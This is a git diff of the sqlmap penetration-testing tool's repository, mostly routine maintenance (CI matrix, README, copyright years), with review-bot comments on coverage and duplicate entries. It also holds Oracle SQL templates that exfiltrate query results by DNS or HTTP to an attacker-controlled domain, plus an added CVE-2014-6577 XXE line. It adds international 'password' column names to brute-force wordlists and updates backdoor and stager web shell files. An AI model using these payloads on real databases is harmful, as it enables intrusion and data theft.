diff --git a/.gitattributes b/.gitattributes
index dd5ba8f8848..a99321d231b 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,8 +1,16 @@
 *.conf text eol=lf
+*.json text eol=lf
+*.html text eol=lf
 *.md text eol=lf
 *.md5 text eol=lf
+*.pl text eol=lf
 *.py text eol=lf
+*.sh text eol=lf
+*.sql text eol=lf
+*.txt text eol=lf
 *.xml text eol=lf
+*.yaml text eol=lf
+*.yml text eol=lf
 LICENSE text eol=lf
 COMMITMENT text eol=lf
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
index 41c825ab207..e6b299956eb 100644
--- a/.github/FUNDING.yml
+++ b/.github/FUNDING.yml
@@ -1 +1 @@
-custom: 'https://www.paypal.com/donate?hosted_button_id=A34GMDLKA2V7G'
+github: sqlmapproject
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
index b7753a2553d..0a2d0fe4aea 100644
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
 If applicable, add screenshots to help explain your problem.
 **Running environment:**
- - sqlmap version [e.g. 1.3.5.93#dev]
- - Installation method [e.g. git]
- - Operating system: [e.g. Microsoft Windows 10]
- - Python version [e.g. 3.5.2]
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
 **Target details:**
 - DBMS [e.g. Microsoft SQL Server]
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index acb3cacae7b..0ecd5cd3fbc 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -10,7 +10,10 @@ jobs:
 strategy:
 matrix:
 os: [ubuntu-latest, macos-latest, windows-latest]
- python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]
+ python-version: [ 'pypy-2.7', '3.13' ]
+ exclude:
+ - os: macos-latest
+ python-version: 'pypy-2.7'
 steps:
 - uses: actions/checkout@v2
 - name: Set up Python
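Review bot: The new matrix in `.github/workflows/tests.yml` runs only `pypy-2.7` and `3.13`, so CPython 2.x and every 3.x release below 3.13 lose CI coverage, while the README touched by this same commit still states support for Python 2.6, 2.7 and 3.x. Either keep one older CPython 3.x entry in `python-version`, or document the choice above the matrix, e.g. `# pypy-2.7 stands in for the 2.x line, 3.13 for 3.x; intermediate versions are not exercised`. The context line `- uses: actions/checkout@v2` also stays on a mutable major tag; since the workflow is being edited anyway, pinning it to a full commit SHA would make the job reproducible and harder to tamper with through a moved tag. The job definition continues outside the hunk.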
diff --git a/.pylintrc b/.pylintrc
deleted file mode 100644
index 631dcdd9110..00000000000
--- a/.pylintrc
+++ /dev/null
@@ -1,546 +0,0 @@ -# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker - -[MASTER] - -# Specify a configuration file. -#rcfile= - -# Python code to execute, usually for sys.path manipulation such as -# pygtk.require(). -init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))" - -# Add files or directories to the blacklist. They should be base names, not -# paths. -ignore= - -# Pickle collected data for later comparisons. -persistent=no - -# List of plugins (as comma separated values of python modules names) to load, -# usually to register additional checkers. -load-plugins= - -# Use multiple processes to speed up Pylint. -# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!! -jobs=1 - -# Allow loading of arbitrary C extensions. Extensions are imported into the -# active Python interpreter and may run arbitrary code. -unsafe-load-any-extension=no - -# A comma-separated list of package or module names from where C extensions may -# be loaded. Extensions are loading into the active Python interpreter and may -# run arbitrary code -extension-pkg-whitelist= - -# Allow optimization of some AST trees. This will activate a peephole AST -# optimizer, which will apply various small optimizations. For instance, it can -# be used to obtain the result of joining multiple strings with the addition -# operator. Joining a lot of strings can lead to a maximum recursion error in -# Pylint and this flag can prevent that. It has one side effect, the resulting -# AST will be different than the one from reality. -optimize-ast=no - - -[MESSAGES CONTROL] - -# Only show warnings with the listed confidence levels. Leave empty to show -# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED -confidence= - -# Enable the message, report, category or checker with the given id(s). You can -# either give multiple identifier separated by comma (,) or put this option -# multiple time. 
See also the "--disable" option for examples. -disable=all - -enable=import-error, - import-self, - reimported, - wildcard-import, - misplaced-future, - deprecated-module, - unpacking-non-sequence, - invalid-all-object, - undefined-all-variable, - used-before-assignment, - cell-var-from-loop, - global-variable-undefined, - redefine-in-handler, - unused-import, - unused-wildcard-import, - global-variable-not-assigned, - undefined-loop-variable, - global-at-module-level, - bad-open-mode, - redundant-unittest-assert, - boolean-datetime - deprecated-method, - anomalous-unicode-escape-in-string, - anomalous-backslash-in-string, - not-in-loop, - continue-in-finally, - abstract-class-instantiated, - star-needs-assignment-target, - duplicate-argument-name, - return-in-init, - too-many-star-expressions, - nonlocal-and-global, - return-outside-function, - return-arg-in-generator, - invalid-star-assignment-target, - bad-reversed-sequence, - nonexistent-operator, - yield-outside-function, - init-is-generator, - nonlocal-without-binding, - lost-exception, - assert-on-tuple, - dangerous-default-value, - duplicate-key, - useless-else-on-loop - expression-not-assigned, - confusing-with-statement, - unnecessary-lambda, - pointless-statement, - pointless-string-statement, - unnecessary-pass, - unreachable, - using-constant-test, - bad-super-call, - missing-super-argument, - slots-on-old-class, - super-on-old-class, - property-on-old-class, - not-an-iterable, - not-a-mapping, - format-needs-mapping, - truncated-format-string, - missing-format-string-key, - mixed-format-string, - too-few-format-args, - bad-str-strip-call, - too-many-format-args, - bad-format-character, - format-combined-specification, - bad-format-string-key, - bad-format-string, - missing-format-attribute, - missing-format-argument-key, - unused-format-string-argument - unused-format-string-key, - invalid-format-index, - bad-indentation, - mixed-indentation, - unnecessary-semicolon, - lowercase-l-suffix, - 
invalid-encoded-data, - unpacking-in-except, - import-star-module-level, - long-suffix, - old-octal-literal, - old-ne-operator, - backtick, - old-raise-syntax, - metaclass-assignment, - next-method-called, - dict-iter-method, - dict-view-method, - indexing-exception, - raising-string, - using-cmp-argument, - cmp-method, - coerce-method, - delslice-method, - getslice-method, - hex-method, - nonzero-method, - t-method, - setslice-method, - old-division, - logging-format-truncated, - logging-too-few-args, - logging-too-many-args, - logging-unsupported-format, - logging-format-interpolation, - invalid-unary-operand-type, - unsupported-binary-operation, - not-callable, - redundant-keyword-arg, - assignment-from-no-return, - assignment-from-none, - not-context-manager, - repeated-keyword, - missing-kwoa, - no-value-for-parameter, - invalid-sequence-index, - invalid-slice-index, - unexpected-keyword-arg, - unsupported-membership-test, - unsubscriptable-object, - access-member-before-definition, - method-hidden, - assigning-non-slot, - duplicate-bases, - inconsistent-mro, - inherit-non-class, - invalid-slots, - invalid-slots-object, - no-method-argument, - no-self-argument, - unexpected-special-method-signature, - non-iterator-returned, - arguments-differ, - signature-differs, - bad-staticmethod-argument, - non-parent-init-called, - bad-except-order, - catching-non-exception, - bad-exception-context, - notimplemented-raised, - raising-bad-type, - raising-non-exception, - misplaced-bare-raise, - duplicate-except, - nonstandard-exception, - binary-op-exception, - not-async-context-manager, - yield-inside-async-function - -# Needs investigation: -# abstract-method (might be indicating a bug? 
probably not though) -# protected-access (requires some refactoring) -# attribute-defined-outside-init (requires some refactoring) -# super-init-not-called (requires some cleanup) - -# Things we'd like to enable someday: -# redefined-builtin (requires a bunch of work to clean up our code first) -# redefined-outer-name (requires a bunch of work to clean up our code first) -# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760) -# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73) -# unused-argument (need to clean up or code a lot, e.g. prefix unused_?) -# function-redefined (@overload causes lots of spurious warnings) -# too-many-function-args (@overload causes spurious warnings... I think) -# parameter-unpacking (needed for eventual Python 3 compat) -# print-statement (needed for eventual Python 3 compat) -# filter-builtin-not-iterating (Python 3) -# map-builtin-not-iterating (Python 3) -# range-builtin-not-iterating (Python 3) -# zip-builtin-not-iterating (Python 3) -# many others relevant to Python 3 -# unused-variable (a little work to cleanup, is all) - -# ... -[REPORTS] - -# Set the output format. Available formats are text, parseable, colorized, msvs -# (visual studio) and html. You can also give a reporter class, eg -# mypackage.mymodule.MyReporterClass. -output-format=parseable - -# Put messages in a separate file for each module / package specified on the -# command line instead of printing them on stdout. Reports (if any) will be -# written in a file name "pylint_global.[txt|html]". -files-output=no - -# Tells whether to display a full report or only the messages -reports=no - -# Python expression which should return a note less than 10 (10 is the highest -# note). You have access to the variables errors warning, statement which -# respectively contain the number of errors / warnings messages and the total -# number of statements analyzed. 
This is used by the global evaluation report -# (RP0004). -evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) - -# Template used to display messages. This is a python new-style format string -# used to format the message information. See doc for all details -#msg-template= - - -[LOGGING] - -# Logging modules to check that the string format arguments are in logging -# function parameter format -logging-modules=logging - - -[FORMAT] - -# Maximum number of characters on a single line. -max-line-length=100 - -# Regexp for a line that is allowed to be longer than the limit. -ignore-long-lines=^\s*(# )??$ - -# Allow the body of an if to be on the same line as the test if there is no -# else. -single-line-if-stmt=no - -# List of optional constructs for which whitespace checking is disabled. `dict- -# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}. -# `trailing-comma` allows a space between comma and closing bracket: (a, ). -# `empty-line` allows space-only lines. -no-space-check=trailing-comma,dict-separator - -# Maximum number of lines in a module -max-module-lines=1000 - -# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 -# tab). -indent-string=' ' - -# Number of spaces of indent required inside a hanging or continued line. -indent-after-paren=4 - -# Expected format of line ending, e.g. empty (any line ending), LF or CRLF. -expected-line-ending-format= - - -[TYPECHECK] - -# Tells whether missing members accessed in mixin class should be ignored. A -# mixin class is detected if its name ends with "mixin" (case insensitive). -ignore-mixin-members=yes - -# List of module names for which member attributes should not be checked -# (useful for modules/projects where namespaces are manipulated during runtime -# and thus existing member attributes cannot be deduced by static analysis. It -# supports qualified module names, as well as Unix pattern matching. 
-ignored-modules=thirdparty.six.moves - -# List of classes names for which member attributes should not be checked -# (useful for classes with attributes dynamically set). This supports can work -# with qualified names. -ignored-classes= - -# List of members which are set dynamically and missed by pylint inference -# system, and so shouldn't trigger E1101 when accessed. Python regular -# expressions are accepted. -generated-members= - - -[VARIABLES] - -# Tells whether we should check for unused import in __init__ files. -init-import=no - -# A regular expression matching the name of dummy variables (i.e. expectedly -# not used). -dummy-variables-rgx=_$|dummy - -# List of additional names supposed to be defined in builtins. Remember that -# you should avoid to define new builtins when possible. -additional-builtins= - -# List of strings which can identify a callback function by name. A callback -# name must start or end with one of those strings. -callbacks=cb_,_cb - - -[SIMILARITIES] - -# Minimum lines number of a similarity. -min-similarity-lines=4 - -# Ignore comments when computing similarities. -ignore-comments=yes - -# Ignore docstrings when computing similarities. -ignore-docstrings=yes - -# Ignore imports when computing similarities. -ignore-imports=no - - -[SPELLING] - -# Spelling dictionary name. Available dictionaries: none. To make it working -# install python-enchant package. -spelling-dict= - -# List of comma separated words that should not be checked. -spelling-ignore-words= - -# A path to a file that contains private dictionary; one word per line. -spelling-private-dict-file= - -# Tells whether to store unknown words to indicated private dictionary in -# --spelling-private-dict-file option instead of raising a message. -spelling-store-unknown-words=no - - -[MISCELLANEOUS] - -# List of note tags to take in consideration, separated by a comma. 
-notes=FIXME,XXX,TODO - - -[BASIC] - -# List of builtins function names that should not be used, separated by a comma -bad-functions=map,filter,input - -# Good variable names which should always be accepted, separated by a comma -good-names=i,j,k,ex,Run,_ - -# Bad variable names which should always be refused, separated by a comma -bad-names=foo,bar,baz,toto,tutu,tata - -# Colon-delimited sets of names that determine each other's naming style when -# the name regexes allow several styles. -name-group= - -# Include a hint for the correct naming format with invalid-name -include-naming-hint=no - -# Regular expression matching correct function names -function-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for function names -function-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct variable names -variable-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for variable names -variable-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct constant names -const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ - -# Naming hint for constant names -const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$ - -# Regular expression matching correct attribute names -attr-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for attribute names -attr-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct argument names -argument-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for argument names -argument-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct class attribute names -class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ - -# Naming hint for class attribute names -class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ - -# Regular expression matching correct inline iteration names -inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ - -# Naming hint for inline iteration names -inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$ - -# Regular expression matching correct class names -class-rgx=[A-Z_][a-zA-Z0-9]+$ - -# Naming hint for class 
names -class-name-hint=[A-Z_][a-zA-Z0-9]+$ - -# Regular expression matching correct module names -module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ - -# Naming hint for module names -module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ - -# Regular expression matching correct method names -method-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for method names -method-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression which should only match function or class names that do -# not require a docstring. -no-docstring-rgx=^_ - -# Minimum line length for functions/classes that require docstrings, shorter -# ones are exempt. -docstring-min-length=-1 - - -[ELIF] - -# Maximum number of nested blocks for function / method body -max-nested-blocks=5 - - -[IMPORTS] - -# Deprecated modules which should not be used, separated by a comma -deprecated-modules=regsub,TERMIOS,Bastion,rexec - -# Create a graph of every (i.e. internal and external) dependencies in the -# given file (report RP0402 must not be disabled) -import-graph= - -# Create a graph of external dependencies in the given file (report RP0402 must -# not be disabled) -ext-import-graph= - -# Create a graph of internal dependencies in the given file (report RP0402 must -# not be disabled) -int-import-graph= - - -[DESIGN] - -# Maximum number of arguments for function / method -max-args=5 - -# Argument names that match this expression will be ignored. Default to name -# with leading underscore -ignored-argument-names=_.* - -# Maximum number of locals for function / method body -max-locals=15 - -# Maximum number of return / yield for function / method body -max-returns=6 - -# Maximum number of branch for function / method body -max-branches=12 - -# Maximum number of statements in function / method body -max-statements=50 - -# Maximum number of parents for a class (see R0901). -max-parents=7 - -# Maximum number of attributes for a class (see R0902). 
-max-attributes=7 - -# Minimum number of public methods for a class (see R0903). -min-public-methods=2 - -# Maximum number of public methods for a class (see R0904). -max-public-methods=20 - -# Maximum number of boolean expressions in a if statement -max-bool-expr=5 - - -[CLASSES] - -# List of method names used to declare (i.e. assign) instance attributes. -defining-attr-methods=__init__,__new__,setUp - -# List of valid names for the first argument in a class method. -valid-classmethod-first-arg=cls - -# List of valid names for the first argument in a metaclass class method. -valid-metaclass-classmethod-first-arg=mcs - -# List of member names, which should be excluded from the protected access -# warning. -exclude-protected=_asdict,_fields,_replace,_source,_make - - -[EXCEPTIONS] - -# Exceptions that will emit a warning when being caught. Defaults to -# "Exception" -overgeneral-exceptions=Exception diff --git a/COMMITMENT b/COMMITMENT deleted file mode 100644 index a687e0ddb6f..00000000000 --- a/COMMITMENT +++ /dev/null 
@@ -1,46 +0,0 @@ -GPL Cooperation Commitment -Version 1.0 - -Before filing or continuing to prosecute any legal proceeding or claim -(other than a Defensive Action) arising from termination of a Covered -License, we commit to extend to the person or entity ('you') accused -of violating the Covered License the following provisions regarding -cure and reinstatement, taken from GPL version 3. As used here, the -term 'this License' refers to the specific Covered License being -enforced. - - However, if you cease all violation of this License, then your - license from a particular copyright holder is reinstated (a) - provisionally, unless and until the copyright holder explicitly - and finally terminates your license, and (b) permanently, if the - copyright holder fails to notify you of the violation by some - reasonable means prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is - reinstated permanently if the copyright holder notifies you of the - violation by some reasonable means, this is the first time you - have received notice of violation of this License (for any work) - from that copyright holder, and you cure the violation prior to 30 - days after your receipt of the notice. - -We intend this Commitment to be irrevocable, and binding and -enforceable against us and assignees of or successors to our -copyrights. - -Definitions - -'Covered License' means the GNU General Public License, version 2 -(GPLv2), the GNU Lesser General Public License, version 2.1 -(LGPLv2.1), or the GNU Library General Public License, version 2 -(LGPLv2), all as published by the Free Software Foundation. - -'Defensive Action' means a legal proceeding or claim that We bring -against you in response to a prior proceeding or claim initiated by -you or your affiliate. - -'We' means each contributor to this repository as of the date of -inclusion of this file, including subsidiaries of a corporate -contributor. 
- -This work is available under a Creative Commons Attribution-ShareAlike -4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/). diff --git a/LICENSE b/LICENSE index a6c9b58d467..4973329375b 100644 --- a/LICENSE +++ b/LICENSE @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2021 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2025 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/README.md b/README.md index bb7ac3f5a80..777d4aa03dd 100644 --- a/README.md +++ b/README.md 
@@ -1,6 +1,6 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. 
@@ -20,7 +20,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform. +sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform. Usage ---- 
@@ -45,28 +45,34 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots Translations ---- +* [Arabic](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ar-AR.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md) * [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) -* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md) +* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md) +* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md) * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md) * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) * [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * 
[Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md) +* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md) * [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md) * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md) * [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md) +* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) * [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) diff --git a/data/html/index.html b/data/html/index.html index a2d4dfc4479..576f2763b8c 100644 --- a/data/html/index.html +++ b/data/html/index.html @@ -1,6 +1,6 @@ - + diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql index adb71cfb2fb..5dda762c08d 100644 --- a/data/procs/oracle/dns_request.sql +++ b/data/procs/oracle/dns_request.sql @@ -1,2 +1,3 @@ SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual 
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
index 5a81545e020..bc912038c7d 100644
Binary files a/data/shell/backdoors/backdoor.asp_ and b/data/shell/backdoors/backdoor.asp_ differ
diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_
index 8e83a0d2009..de889b1ed7a 100644
Binary files a/data/shell/backdoors/backdoor.aspx_ and b/data/shell/backdoors/backdoor.aspx_ differ
diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_
index 8d01202f00f..f798ea5778c 100644
Binary files a/data/shell/backdoors/backdoor.jsp_ and b/data/shell/backdoors/backdoor.jsp_ differ
diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_
index 5db8f130f9b..720bfe1fff4 100644
Binary files a/data/shell/backdoors/backdoor.php_ and b/data/shell/backdoors/backdoor.php_ differ
diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_
index 5c235ecb5f4..bd08896ad19 100644
Binary files a/data/shell/stagers/stager.asp_ and b/data/shell/stagers/stager.asp_ differ
diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_
index f20887a96d6..3694b2c1533 100644
Binary files a/data/shell/stagers/stager.aspx_ and b/data/shell/stagers/stager.aspx_ differ
diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_
index beec2ae56ae..f70ac6f9efd 100644
Binary files a/data/shell/stagers/stager.jsp_ and b/data/shell/stagers/stager.jsp_ differ
diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_
index eafe6277127..c5103161a7d 100644
Binary files a/data/shell/stagers/stager.php_ and b/data/shell/stagers/stager.php_ differ
diff --git a/data/txt/common-columns.txt b/data/txt/common-columns.txt
index 1b2d7cbfb01..3c87ef83b4a 100644
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission id @@ -1844,6 +1844,10 @@ banner_id error language_id val +parol +familiya +imya +otchestvo # site:jp @@ -2731,7 +2735,120 @@ ssn account confidential +# site:nl + +naam +straat +gemeente +beschrijving +id_gebruiker +gebruiker_id +gebruikersnaam +wachtwoord +telefoon +voornaam +achternaam +geslacht +huisnummer +gemeente +leeftijd + +# site:cn + +yonghuming +mima +xingming +xingbie +touxiang +youxiang +shouji + # Misc u_pass hashedPw + +# password (international) + +adgangskode +aikotoba +amho +bimilbeonho +codewort +contrasena +contrasenya +contrasinal +esmeramz +facalfare +fjalekalim +focalfaire +gagtnabar +geslo +gozarvazhe +gunho +haslo +heslo +hudyat +igamalokungena +iphasiwedi +javka +jelszo +kadavucol +kalameobur +kalimatumurur +kalimatusirr +kalmarsirri +katalaluan +katasandi +kennwort +kodeord +kodikos +kouling +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa +losen +losenord +lozinka +lykilord +matkhau +mima +nenosiri +nywila +okwuntughe +oroasina +oroigbaniwole +paeseuwodeu +parol +parola +parolachiave +paroladordine +parole +paroli +parolja +parool +parulle +pasahitza +pasfhocal +pasowardo +passord +passwort +pasuwado +pasvorto +rahatphan +ramzobur +salasana +salasona +santoysena +senha +sifra +sifre +sisma +slaptazodis +synthimatiko +tunnussana +wachtwoord +wachtwurd +wagwoord diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt index c8804441b67..a6b3dc53b19 100644 --- a/data/txt/common-files.txt +++ b/data/txt/common-files.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # CTFs diff --git a/data/txt/common-outputs.txt b/data/txt/common-outputs.txt index a3ea71dac0f..f882a4b1b05 100644 
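Review bot: The entries added to `data/txt/common-columns.txt` contain duplicates: `gemeente` is listed twice inside the new `# site:nl` block, `wachtwoord` appears both there and in the `# password (international)` block, `mima` is in both `# site:cn` and the password block, and `parol`, added by the `@@ -1844,6 +1844,10 @@` hunk, is repeated in the password block. Whether the loader de-duplicates is not visible here; if it does not, every repeat is a redundant check per run, so the second occurrences should be dropped. The `# password (international)` heading also departs from the file's `# site:xx` section convention; a one-line comment such as `# transliterated words for "password", grouped by meaning rather than by site` would say why these are kept apart.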
--- a/data/txt/common-outputs.txt +++ b/data/txt/common-outputs.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission [Banners] @@ -399,6 +399,7 @@ XDBWEBSERVICES # MySQL information_schema +performance_schema mysql phpmyadmin diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt index d09923d87e7..0f2baa69b83 100644 --- a/data/txt/common-tables.txt +++ b/data/txt/common-tables.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission users 
